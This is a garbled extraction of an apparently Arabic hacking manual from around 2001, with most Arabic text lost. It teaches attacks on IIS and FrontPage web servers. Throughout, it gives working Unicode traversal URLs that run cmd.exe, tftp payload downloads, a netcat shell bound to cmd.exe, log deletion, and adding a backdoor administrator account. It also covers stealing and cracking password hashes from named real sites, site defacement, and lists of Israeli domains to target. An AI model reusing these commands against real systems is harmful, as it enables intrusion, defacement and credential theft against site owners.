\cmd.exe+c:\inetpub\script
s\shell.exe
mspft.pll -2
open Echo
. ftp.host.com
. FTP
/
c+echo+open+ftp.host.com+
>+c:\winnt\mspft.ppl
-3
Anonymous
mspft.pll
/
shell.exe?/c+echo+anonymo
us+>>+c:\winnt\mspft.ppl
325

-4
hExRay@Hotmail.Com
mspft.pll
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl
. Anonymous User -5
mspft.pll
/
shell.exe?/c+echo+user+an
onymous+>>+c:\winnt\msp
ft.ppl
-6
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl

326

.g

/
shell.exe?/c+echo+lcd+c:\in
etpub\wwwroot+>>+c:\win
nt\mspft.ppl
-8 FTP
. FTP Get
index.htm
/
shell.exe?/c+echo+get+inde
x.html+>>+c:\winnt\mspft.
ppl
-9 Quit
/
>>shell.exe?/c+echo+quit+
+c:\winnt\mspft.ppl
-10 FTP.exe?+"-
s:c:winnt\mspft.ppl

mspft.ppl -:
327

Open FTP.host.com Anonymous hEx@Hotmail.Com User Anonymous hEx@Hotmail.Com Get index.html Quit msadc/..%c0%af../../
%c0%af../winnt/system32/
ftp.exe?+""s:c:\winnt\mspft.ppl

.
Microsoft )
. ( Access L0phtCrack
-:
\ _ .SAM
328

\winnt\repair
L0phtCrack
-:


PASSFILT.DLL

-:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL

329

. ASP
MySQL

) ( htr.+
-:
http://www.xxxx.com/defa
ult.asp+.htr



database.inc
.
.


. TFTP
-1
index.htm \:c
330

-2 TFTP
.

331

c+tftp.exe+"-/
i"+1.1.1.1+GET+index.ht
m+C:\inetpub\wwwroot
\index.htm
.
tftp.ex

e

.
""i-

1.1.1.1

.
GET

index.

htm
\
inetpu

b\ww
\wroot

index.
332

htm

.
Log
System32 -:
/
c+del+c:/winnt/system32/lo
gfiles/*.log

333

"
) ( "
> . <

334


..
..

:
------------- )(
. cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe
.. Echo
CMD1.exe
) ( !
..

IWAM_USER .
Guest
. IIS
335

Guest
!! (:

(: * nix Microsot
(:
Administrator
(:

..
.
(: .
..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:
336


:
Sechole - 1
.. )
(
..
. . . (:
Tlist - 2.
.. +
(:
Kill.exe -3 .
.
NCX99 -3 NC
99
TFTP32.exe -4 ..

(:
:
337

..
ncx99.exe :
http://target/scripts/..../winnt/syst
em32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD =
. Guest
.. TLIST
..
PID ..
..
PID
..
Kill :
.. KILL.exe PID PID (:
!
..
Sechole ..
338

. ..
(: Sechole.exe .

IWAM_USER
.. Administrators

. Access Denided

:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..


... (:
:
IWAM_USER

339

: ..
!
.
.
(: .. .
Administrator
.

!! (: (:
:
net user Demon pass /add && net
localgroup administrators Demon
/add Save as . add.bat
: .
Demon Pass
(: ..
add.bat
) (
(:
.. (:

340

(:
)
!(
.
..

netstat -an
..
(:
90%
(: 139
(:

(:
.. . (:
.
..
. GUI
341

..

GEtAdmin Sechole2
.. WINvnc

342

"
"

343

><
> : <


:
(1
(2 TFTPD
(3
=============================
====================
=============================
====================
(1

/http://www.devil2k.com
)) ((

(2 TFTPD

/http://iisbughelp.4t.com

(3

) (
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
\C:
356

scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+D
\D:
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+E
\E:

.

)) ((
(1 msadc
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
357

IIS )) ((
:
C:\Inetpub\wwwroot

D:\Inetpub\wwwroot

E:\Inetpub\wwwroot
C


msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c

:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+dir+C:\Inetpub\wwwroot
358


)
( wwwroot

wwwroot
.

index.htm

)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp

wwwroot index.htm
.

359

. index.htm
ss.htm

. c+dir c+ren
))
Dos Command
Prompt

:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm
ss.htm
(:
A


!!!Hacked
index.htm
360


TFTP



. TFTP
)

(
\ C:

index.htm \C:
\C:

C:\inetpub\wwwroot
))
(( TFTP
.
361

TFTP
)) (( .



:
tftp.exe -i XXX.XXX.XXX.XXX get
index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX
((
.
index.htm
wwwroot





:

362

"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm
(:
TFTP
index.htm

:
msadc/..%c1%9c../..%c1%9c../../
?%c1%9c../winnt/system32/cmd.exe
"/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm

)) (( (:
: . EXE
:
EXE
hunter.exe

363

:
.
C:\ index.htm
:
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+tftp.exe+"i"+XXX.XXX.XXX.XXX+GET+hunter.
exe+C:\hunter.exe

msadc/..%c1%9c../..%c1%9c../../
%c1%9c../hunter.exe

msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+hunter.exe

364


*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.log/s


tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.tmp/s



))
((

bat

365

. .


))
(( system32
_______________________________
_______________________________
__________________
:

tftp
))
(( system32
)) ((
.
.


IIS Secure IIS
Eeye
366


)) ((
%90 . IIS
)) .
(( .

" " IIS


> .<
>< DEMON :
-------- - :
--------367

IIS
..

.. .
.
-------- - :
--------
IIS4.0 IIS5.0 80
)) (( .
------------ - :
------------ CGI-Scanner -1 .. Whisker
) :
( www.wiretrip.net/rfp
-2 )
:
( /http://www.activestate.com
368

-3 ) ( .. IIS

#########################
#########################
#########################

###########
# Game Starts !#
###########

---------------- : IIS Hack.exe


--------------- eEye
nc.exe
.. 80
cmde.exe
369

. Administrator
NC.exe IIS Hack.exe
. /http://www.technotronic.com

..
nc.exe
) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe
http://www.target.com/ 80
your_IP/ncx.exe
. :
/c:\>nc http://www.target.com
eGG SheLL
: IIS4.0
)) (( .
do you want me to explain what to
do next, hey common you must be
kidding
370

....hehe...

-----------------: MDAC = RDS


---------------- )
%40 ..
.
..
. SYSTEM . ..
. .
. ..
. c:\>nc -nw -w :
2 http://www.host.com/ 80
GET /msadc/msadcs.dll HTTP :
application/x_varg :
. )) (( ..

www.wiretrip.net/rfp :
(( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
371

Please type the NT commandline


you want to run (cmd /c
assumed):\n
cmd /c

echo hacked by me hehe > :
C:\inetpub\wwwroot\index.htm
.
Hacker's Swiss knife Army
Nc.exe :
systemroot%&&tftp -i YourIP GET%
nc.exe&&del ftptmp&& attrib -r
nc.exe&&nc.exe -l -p 80 -t -e
cmd.exe
))
((
. 80
Administrator
.

-------------------------------------372

-: Codebrws.asp & Showcode.asp


------------------------------------- ASP IIS

. ..

)) asp.
(( .
. . ))
. (( :
http://www.victim.com/msadc/sampl
_.es...nt/repair/sam
. & Expand it
.. Crack it. LC3.0
) 24 ( .

-------------- : Null.htw
----------- ..
..
373


.. ASP
:
?http://www.victim.com/null.htw
CiWe...HiliteType=full

. Default.asp

---------------------- : webhits.dll & .htw


--------------------- . :
http://www.victim.com/blabla.htw
format of the :
QUERY_STRING is invalid
. . %90
:
www.victim.com/xxxxxxxxx/xxxxxxx
x/x...hilitetype=full

XXXXX/XXXXX/XXXX/XXX.htw
374

, :
iissamples/issamples/oop/qfullhit.ht
w
iissamples/issamples/oop/qsumrhit.
htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.ht
w
.
.. LC3

-----------------------------------------------]ASP Alternate Data Streams [::


-: $DATA
----------------------------------------------- . .. 1998
IIS3.0
.. IIS4.0
))
((
375



Global.asa

http://www.victim.com/default.asp::
$DATA

------------------ : ASP dot bug


----------------- .
. ..
. .. 1997
:
http://www.victim.com/sample.asp.

. IIS3.0

------------------------------------ : ISM.DLL Buffer Truncation


376

-----------------------------------
..

.. .
..
ISM.dll
)( 20%
. Space
:
http://www.victim.com/global.asa
%20(...<=230)global.asa.htr
<=230. 230
.. %20
.. IIS 4.0&5.0

. ,

ISM.dll
..
..
. .
377

Rebot . Logout & Login

----------: htr.+
-------- .
. ASP
:
http://www.victim.com/global.asa+.h
tr

------------- : site.csc
-----------
DNS DSN, UID
.. and PASS Database
:
http://www.victim.com/adsamples/c
onfig/site.csc
378

. ..
.

"
"UniCode
> <
><Dark Devil :
379

. ::
.


.



)
.... (



.
)( Trust Me

::
:
====

Found On 15 May 2001 BY NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
::
)
IUSR_machinename
( account
cgi

) DeCode
(


::
http://iisserver/scripts/..%5c..
381

<=== %...md.exe?/c+dir+c
<==== /http://iisserver

* - /scripts/
)
( .
cgi

( executable directory

iis
:: iis
executable directory

)

(
382

* <=== winnt/system32/cmd.exe
cmd
)
cmd . ping
netstat .... traceroute
(
* - . .

) (
.
argument

copy .


argument /c c/

:: 2000
cmd ) (?/ cmd
, .

383

::
Starts a new instance of the Windows 2000 command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] string]

/C      Carries out the command specified by string and then terminates
/K      Carries out the command specified by string but remains
/S      Modifies the treatment of string after /C or /K (see below)
/Q      Turns echo off
/D      Disable execution of AutoRun commands from registry (see below)

::
384

Starts a new instance of the


Windows 2000 command interpreter

2000
cmd
. arguments
arguments
c/ ::
Carries out the command specified
by string and then terminates
.

::
argument
k/ ::
Carries out the command specified
by string but remains

)

ping (
argument Q/
385

echo

arguments
)
c/ ( k/
on off
cmd )
(

MCSE


arguments
c/
.

, cmd.exe


:: .

Ping.exe+PRINT cmd.exe?/c
386


). ( enjoy this ::
http://issserver/scripts/..%5c..
%.../ping.exe+PRINT
* - +c/ c/
argument cmd.exe
cmd + /
c .

+

.
**
. )
(
decode

simplyfiey
::
387

%255c..%255c../
..../



iis check


iis
check

. iis
check

check


( slash) /

::
388

computer logic
HexaDecimal
Values values

/ hex value
::
20% : )(space

hex values
,
hex values


decode

( slash) /
::
hex value = /
, 5c%
/ value

389



iis

value
hexadecimal values
::
%25 = %
%35 = 5
%63 = c
iis checker

/
.



simplify

390


::
%255c     : %25 = %, 5 = 5, c = c      => %5c
%%35c     : % = %, %35 = 5, c = c      => %5c
%%35%63   : % = %, %35 = 5, %63 = c    => %5c
%25%35%63 : %25 = %, %35 = 5, %63 = c  => %5c
%5c = /


5c% / = 5c%
iis
. checker


::
http://iisserver/scripts/..%5c..
%...xe?/c+dir+c:+/s
391


s/+






.
MCSE
) (
2000
.WIN2000 RESOURCE KIT

392

"
"
> : <
..
. .



.....
******************
393

...

.
.....
.
2000 .
. . IIS :
*1 .
*2 .
*3 "
".
*4 .IIS
..

:
wwwroot
Inetpub
IIS
/http://127.0.01


394


/http://127.0.0.1

.

"
"
> <

395

><De\/iL Ni9hT :
= =-,,,

)),,,,((


=-

=-

.. =-
=-
396


=-






= =




)) ((


397

-1

)) ((

-2

/http://www.name.8m.com
.
FreeServerS

))....8m.s5


)) ((
))
((


398




))
((


=-



IE 5 IE 5.5

399


)) "
"((




,,,,
keykey2000



.
http://www.mikkotech.com/kk2000pr
o.exe

400

SN: K100-43-109-0793218E876A4C9-29


godwill
. 5
))5.5 ((
http://www.thecorpz.org/activex/gw
package.zip

==================== ====
=================

.

401


enter

Upx ))
((
Html .

General options

enter exe file
))
((
enter html
use default
402

page.
HTA File Name

Done. ))
((

http://www.thecorpz.org/html/active
sploits.html
===================
403

====================

.

. .

))
,,((
.

" "
> <
><Linux Girl :
404


) ( cookies

. .
..

...
. :
-1 .
-2 .
-3 .
-4 : .

.



405

.







.


IP
. .
Log Files
.



.
406

.


.

"
"
.
.

.




.
.
:
...
407


: :
. setcookie
:
:code

boolean setcookie ( string name [, string value [, int expire [, string path [, string domain [, int secure]]]]] )

:
408

: name ...

.
: value ... ...
...
... :
. serialize
.
unserialize .
: expire )
1 ( 1970 .
. ... :
<- :
.
<- : .

.
<- : 409

. .
:
:code
<?
setcookie('site','http://www.palhackerz.com/',time()+3600);
?>

time

) 1 . (1970
:


.

410

:
:code
<?
setcookie('site','',time()-360000);
?>

:
-1
. .
-2
.
:
setcookie
.. :
:code

411

<html>
<body>
<?
setcookie('site','palhackerz.com',time()+20000);
echo " Alfjr.com : the best islamic forum";
?>
</body>
</html>


412

... setcookie ?<


:
:code
<?
setcookie('site','palhackerz.com',time()+20000);
?>
<html>
<body>
<? echo " palhackerz.com : the best Hacking forum"; ?>
</body>
</html>

413


:
..
.
.
. PHP ...

$_COOKIE
Associative Arrays
.
:
:code
<?
echo $_COOKIE['site'];
?>

:
:code
palhackerz.com
:
. .

..
-1 : user.php. :
<- : . <- :
-2 index.php
. user.php
415

:
: user.php -1
:code
<?
/*-----------------------
Cookies-Based Background Selector..
Created By :
"Rasha"<rasha@h4palestine.com>
For : h4palestine.com
-------------------------*/

// Read the requested action from the query string explicitly instead of
// relying on register_globals, so the script also works where that is off.
$do = isset($_GET['do']) ? $_GET['do'] : '';

function display_form(){
?>
<html>
<body>
<!-- Color setting Form -->
<form name=color_select method="GET">
<INPUT type="hidden" name="do" value="set_color">
<INPUT name="color" type="text" value="<? echo htmlspecialchars(get_color()); ?>">
<INPUT type="submit" value="">
</FORM>
<!-- Color Clearing Form -->
<form name=color_clear method="GET">
<INPUT type="hidden" name="do" value="clear_color">
<INPUT type="submit" value="">
</FORM>
</body>
</html>
<?
}

function set_color(){
// Store the chosen color in a cookie that expires 36000 seconds from now
setcookie('color',$_GET['color'],time()+36000);
header('Location:index.php');
}

function get_color(){
// Fall back to white when no color cookie has been set yet
if(isset($_COOKIE['color'])){
return $_COOKIE['color'];
}else{
return "#FFFFFF";
}
}

function clear_color(){
// An expiry time in the past makes the browser delete the cookie
setcookie('color','',time()-36000);
header('Location:index.php');
}

// selection
if ($do=='display_form'){
display_form();
}elseif ($do=="set_color"){
set_color();
}elseif ($do=="clear_color"){
clear_color();
}
?>

display_form. .
set_color. .
.
get_color
.
clear_color. .
-2 : index.php
get_color
user.php :
:code

422

<html>
<BODY bgcolor="<?
include('user.php');
// The cookie value is user-controlled, so escape it before placing it in the attribute
echo htmlspecialchars(get_color()); ?>">
<h1>.....</h1>
<br>

<br>

<a href="user.php?do=display_form"></a>

</body>
</html>

" God
Will "
> <
> : <
:
** html .
** ).
34 (
** Godwill .
:
_http://www.geocities.com/love2002
il/godwill16.zip
tlsecurity :
:
html
Godwill
...
426

html ...

427

General Options
...

428


Done
...

429

Gen

...enter Output 3
...


/http://www.tripod.lycos.co.uk
...
....

) ( zone Alarm
.
...
...
.

"
"NOOP4
> <
>< .MoHfOx. :

god will
.

.. godwill


noob 4.0

=============================
==========
=============================
-1

========
=============================
==
=============================
layout 2<<<<====:::
6
-2 Internet
Explorer 5
-3 Internet
Explorer5.5
4 5
-6 .

=============================
=====================
===================
executable file 3
<<<<====:::
-7
-8

=============================
==========
=============================
-9
<<<<====:::

...

"
"
><
><. ( T.O.L. ( DeXXa :
:
* . .
* FrontPage Server
Extensions .

* Microsoft Office
. FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
*
. Server Side Scripting
. Language






Screen
. Capture
@ :
.
.
. FrontPage Server
Extensions
. FrontPage Extension
Server
. FrontPage Extension
Server
. FrontPage.

@
* FrontPage Server
. Extensions
* .
* .
* .
.
@ :
PHP
CGI Perl SSL FTP . SQL
Webmasters

Microsoft Office FrontPage

Office

. .
@ FrontPage Server
Extensions
) : .
(

.
Server
.
:
/_private/
/_vti_bin/
/_vti_cnf/
/_vti_log/
/_vti_pvt/
/_vti_txt/
:
* _: vti_bin
:
) : _
( vti_bin
../_vti_adm/
../_vti_aut/


.
:
../shtml.exe
../fpcount.exe
* _: vti_pvt

:
: service.pwd DES
.
: service.grp . authors
deptodoc.btr : doctodep.btr
.
.

htaccess.
. )
( .
) : .
(
* _: private
. htaccess.
@ FrontPage
Extension Server

FrontPage
Extension Server
. HTTP

FrontPage Request
. . FrontPage
Extension Server
.
fpcount.exe
Extension Server .

.
@ FrontPage Extension
: Server

FrontPage

FTP

. .

: FrontPage Extension Server
) : XP
.
(
* FrontPage
. Office
* File . Open Web
* )
( .
* .


.
*


.
@ FrontPage
. :

:
* :
) : _ vti_inf.html

(
. FrontPage. .
_ vti_inf.html :
http://www.Victim.com/_vti_inf.html
FrontPage Configuration Information


FrontPage Extension
Server
. .
:
. Source Code
"FPVersion="Version Version .
* _: vti_cnf
. FrontPage. .
:
http://www.Victim.com/_vti_cnf
. Source Code
:vti_generator:Programe
Programe Microsoft
FrontPage X . X
* :
. FrontPage. .
. Source Code
<Head></Head> :
<Meta Name="GENERATOR" Content="Programe">
Programe Microsoft FrontPage X.0


.

. X
* : NetCraft
. NetCraft.net . //:http .

FrontPage
mod_frontpage/X X
. FrontPage Extensions Server
* : Telnet

) :
.
(
Start Run . Telnet
Microsoft Telnet> Open www.Victim.com 80
Request. Method . Head
) : .
( HTTP
http://www.Victim.net
ISP.net
:
HEAD / HTTP/1.1
Host: www.Victim.net
Accept: */*
Connection: close
. Response . Server
.

FrontPage
mod_frontpage/X
X FrontPage
. Extensions Server
@ :

_ vti_pvt :

) : . .
PHP
(
* .
* PHP
:
<?PHP
// $file comes straight from the request, which is the traversal the text describes
$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));
Echo $get;
FClose($open);
?>
PHP. .


file
:
http://www.Victim.com/uploded_file.
..../../etc/passwd
uploded_file

. .

"
"
> <
> :<
.//
NT - Unix
-1 .
frontpage.
:
netcraft/http://www.netcraft.com

mod_frontpage/x
)=x (
/_vti_inf.html
:
http://www.almodammer.com/

http://www.almodammer.com/_vti_inf.html
Enter

Frontpage Configuration
Information

.
/_vti_cnf
:
http://www.almodammer.com/_vti_cnf

source

vti_generator:Programe

Programe

------------------------------------------------- -2 frontpage

frontpage


http://www.almodammer.com/
frontpage _vti_pvt

http://www.almodammer.com/_vti_pvt

:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============


username:passwd
.

service
user / password

operator:hi9LHn9wAMuKM
.operator:
hi9LHn9wAMuKM:



=)=(Crack Jack
=)=(John The Ripper
.
John The Ripper
::
http://www.openwall.com/john


\c:
RUN
txt passwd

start
run

command
Enter
DoS
RUN

.
cd..

c:\>

cd john
Enter

c:\john>

cd RUN

c:\john\RUN>
John The Ripper

====
john -i:all passwd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
--------------------------------- .
====
john -single passwd.txt
--------------------------------
.
------------------------------------------------------------------------------

john.pot


------------------------------------------------------------------------------ username
password
!!

/
)(1
frontpage

file
open web
)(2
FTP
FTP
ws-ftp
pro ftp
...
DOS

=============================
=========

google
/http://www.google.com

/_vti_pvt

/http://www.altavista.com

link:service.pwd
..
link:adminstrators
password
.

" "
><
> :<
Random Hacking

CGIScripts
Random Hacking


spiders
altavista.com
) link:xxxx.cgi or pl
(
help.cgi link:help.cgi
Ikonboard
HTML
help.cgi

http://www.example.com/cgi-bin/help.cgi

http://www.example.com/cgi-bin/help.cgi?helpon=../members/[member].cgi%00
[member]
[ ]

Ikonboard
2.1.7

CGIScript

url



Exploit
http://www.secure.f2s.com/eng_ver/bugs/

http://www.securiteam.com/



....

...

CGIScripts

!!



(:

co.il - 12610 sites
org.il - 1104 sites
ac.il - 70 sites
gov.il - 78 sites
net.il - 54 sites
muni.il - 29 sites
com - 2009 sites
net - 137 sites
org - 121 sites
edu - 4 sites
israel.net - 84 sites
.il - sites


........
http://iguide.co.il/sites/sites.htm

http://www.achla.co.il/
http://www.reshet.co.il/data/index.vs?dw=1
http://www.maven.co.il/
http://www.tapuz.co.il/
http://www.walla.co.il/
http://www.info.gov.il/find.pl
. altavista.co.il

.

/w3-msql
proxy.isp.net.sa:8080
GET

GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Host: www.com.il
Proxy-Connection: Keep-Alive

http://www.com.il/cgi-bin/
/cgi-bin/w3-msql

WWWMSQL
cgi-bin/w3-msql


WWWMSQL

w3-msql
Exploit w3-msql

http://www.securiteam.com/exploits/2WUQBRFS3A.html

Random Hacking
w3-msql

/_vti_pvt/


HTML *.
html ..
The page cannot be displayed
Forbidden .... not found....



..
.....

url c

perl Shell *.sh
Batch

perl exploit.pl exploit

(:

(:

perl exploit.pl > log.htm

Exploit
) ( RedHat 6.2
.

"
"
><
>< marwan911 :


. .

:IIS ) .
(
:apache
.


.

http://www.netcraft.net

whitehouse.org
: //:http /
http://uptime.netcraft.com/up/graph...whitehouse.org

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000


IIS5.0
. 2000
IIS5.0 )
(
. 2000
) (



IIS
.
.


.

www.arank.com

The site www.arank.com is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

apache 1.3.20
FrontPage/5.0.2.2510
. Linux


.



_ vti_pvt _ private


service.pwd users.pwd
authors.pwd adminstators.pwd

)
%70
(

goodyco:CalXS8USl4TGM

http://www.goody.com.sa/_vti_pvt/s
ervice.pwd
goodyco
CalXS8USl4TGM
John the Ripper
) (

john -i PASSWORD.FILE
.
.



.
telnet .

.
c

================
http://neworder.box.sk/
) ( IIS
apache

http://www.ussrback.com/
EXPLOITS

.. c perl
.

"
"
> <
>:

.



( -1. .

( - ) IIS (
( - ) apache (
( -2 .
( -3
( -4
IIS







.
apache

.

. .

" )>&<(
"
> <
> : <
* :. (:
* : D:

* : ,
.
* : ,
, !!

* : , (:
* : (:

:2 ,
. .
:2 D:

NT & Unix
, FrontPage
(:
:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
_vti_pvt
:
http://www.tradesystemlab.com/_vti
(: _pvt/service.pwd
service.pwd
:
-FrontPage- #
tradesys:FpNTpIDWSk872
. (:

:3 ,
S:
: .
, WS_FTP www
ftp ftp.ebnmasr.com :
,
. (:

:4
. :
tradesys:FpNTpIDWSk872 )(N
:4 !! ,
John The
, Ripper :
http://www.openwall.com/john

:5 , . ,

:5 !! , , (:
: ,
, doc & run :
, run :

: p:
command.com :
, run
:
tradesys:FpNTpIDWSk872
txt passwd run
, , john.exe
command.com :
<< john -single passwd.txt


.
<< john -i:Digits passwd.txt
.
<< john -i:Alpha passwd.txt

<< john -i:all passwd.txt
) , .
, ( D:

john.pot :

:6 , ,

:6 . ,
;( , .

(:

:7 , ) , (Y
.
:7 :
, tradesys:FpNTpIDWSk872
. ) tradesys :
( :

:8 ,
$:
:8 ,,, ;( ,
,

) ( D:
(:

:9 ,
, (:

: , :
. spiders
,
. ,
, walla.co.il :
,
;( .

:10 ,
, !!
:10 .
, $:
, ,
,(: (: service.pwd :
(:

:11 , ,
(:
:11
, EXPLOITES
, , (:
, EXPLOITES
. /http://www.ussrback.com :

" CgiScaner
"
><
> : <

1.
2 .
3 .
4 .

.
..
http://mypage.ayna.com/vox9
9/cgiscan3.zip

"
"
> <
> :<
::: .

,,,


,,

.
.

...

. ::




27374 . 1243

**



.

------------


+

........ ,,,,

...
http://mypage.ayna.com/a7lla
1/superscan.zip

" Shadow Scan Security


"
> <
> <
:


Shadow
Scan Security


http://www.safety-lab.com/SSS.exe

http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe

:
=============================
===========
SetUp

:

+++++++++++
[] ][1
[] ][2 .
=============================
===========

*****& &*****

.
=)
Start


ShadowScanSecurity
(=
-1-

Scanner
-2-

=1
4 )
(
=2

=3
4

=4

=5

=6
=7
-3-

) (1 -2-
) (2
) (3
-4-

+1+
+2+
+ 3+

+4+

+ 5+ :-3-
+ 6+.
+ 7+

-5-

Done


-6-
Start Scan

1
-5-


"
"

> <
> : <

/etc/shadow

/etc/shadow
BSD
/etc/master.passwd
SGI IRIX
/etc/shadow
. . AIX
/etc/security/shadow
)) )) -
)) 64 64
(( (( ((
/etc/shadow
)) MD5 ((

)) (( NT - XP - 2000
)) (( LanMan
/winnt/system32/config/sam
)) .
.
((

)) ((
/winnt/repair/sam or sam._


)) - ((
WINNT
.Windows
" ) ( "
> <

:

..
..

..
Telnet
..
Telnet .
.
Port
).(
) (Daemon
. .
:
)( )(
)( .. .
) (Telnet
) (Daemon
..
.. .
) .( )
( .

Telnet )
( ..
.
.
Daemon
.

. Telnet FTP Client



FileTransfer
Protocol .. 21

. Telnet
FTP Client .
!! FTP

..

-1 Telnet
ftp.zdnet.com 21

- Source Code
220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.

Banner FTP
Daemon. zdnet
.

.
-2 . .
Username .. Password
zdnet . Anonymous
. :

- Sources Code
user anonymous

.
- Sources Code

331 Guest login ok, send your complete e-mail address as password.


- Sources Code

pass zorro@

. Anonymous
.
..
)
) @
.
- Sources Code

230-You are user #552 of 2000 simultaneous users allowed.
230-
230 Logged in anonymously.

..
..
. .

.
)
( .. !!

. . .

:
)( IP
. .


.. . .
:
PASV
- Sources Code
PASV

. IP
) . ( )(
..

- Sources Code

227 Entering Passive Mode (207,189,69,61,12,41)


..
) ( IP
. .. 207,189,69,61

12 * 256 + 41 = 3113


. .. 3113
.
Telnet ftp.zdnet.com
.. 3113

..

( LIST.
(
- Sources Code

LIST
.
- Sources Code
125 Data connection already open; Transfer starting.


.
.


.. PASV
.
..

) ( .


.. . CuteFTP!!





http://www.vbip.com/winsock/winsock_ftp_01.asp
( )

http://www.vbip.com/winsock/winsock_ftp_ref_01.htm ( )
http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html
( .)

" ) ( "
> <
> :<
:
~~~~~~~~~
. password file password file
) (encryption ) (shadowed

-:
~~~~~~~~~

!

) ( Void Eye

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
.
nmap

www.insecure.org/nmap
.
SuperScan

. Perl
Perl
C

( /http://www.7lem.com

. ping
(
(21 - 22 - 23 - 25 - 37
110 - 143 - 513 - 514 - 587) .


...



23
/http://www.7lem.com

/telnet http://www.7lem.com
Windows Linux
SunOS FreeBSD QNX
Linux
...
Linux

---------------------
SunOS 5.7
login :
---------------------
. SunOS 5.7

).
( .


.
nc www.7lem.com 80
---------------------
.
.
.
Server: Apache/1.3.*
.
.
---------------------
...

110 25

smtp pop
) ( Linux
host 7lem.com

-:

) (
-:
.
.... . queso
.

/queso http://www.7elm.com

queso 80
...
. SunOS 5.7

/http://www.condor.com )
support webmaster ... info (
DNS

.
whois . whois
whois
whois man whois
.


http://www.psyon.org/tools/index.html


. whois

http://www.google.com/search?q=whois&btnG=Google+Search

~~~~~~~~~~~~~~~~~~~~~~~~~~
. void eye
ShadowSecurityScaner
!! .




Apache IIS
CGI Perl PHP
.



..
.




counter
mp3
Don't Tell Me

25 23 21
110
Ikonboard v2.1.8b

Ikonboard v2.1.8b
Ikonboard v2.1.7b

cgi pl


% 80
cgi

etc/passwd
. FreeBSD

shadow master.passwd

.. ...

++++++++++++++++++++++++

} http://www.fbunet.de/cgibin/nph-
{ %20%20%20%20%20.cgi CGI

....






: timduff.com




.

.
i'm from saudi arabia
. .






/../../../../../../../../../../../../../../../../../../../
!


-:
-1
-2 .

.....
-3 ) Perl -
( Cgi
-4
%100

) (
-5
)

(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~



/http://www.timduff.com

)
(
)( sh

shell
* sh.

shell

)(bat
)(
C



. gcc
gcc Exploit.c -o Exploit
) *c.
* C. c
++
)* (h.
(


Perl

)
(
....

= Exploit

password file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


----------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
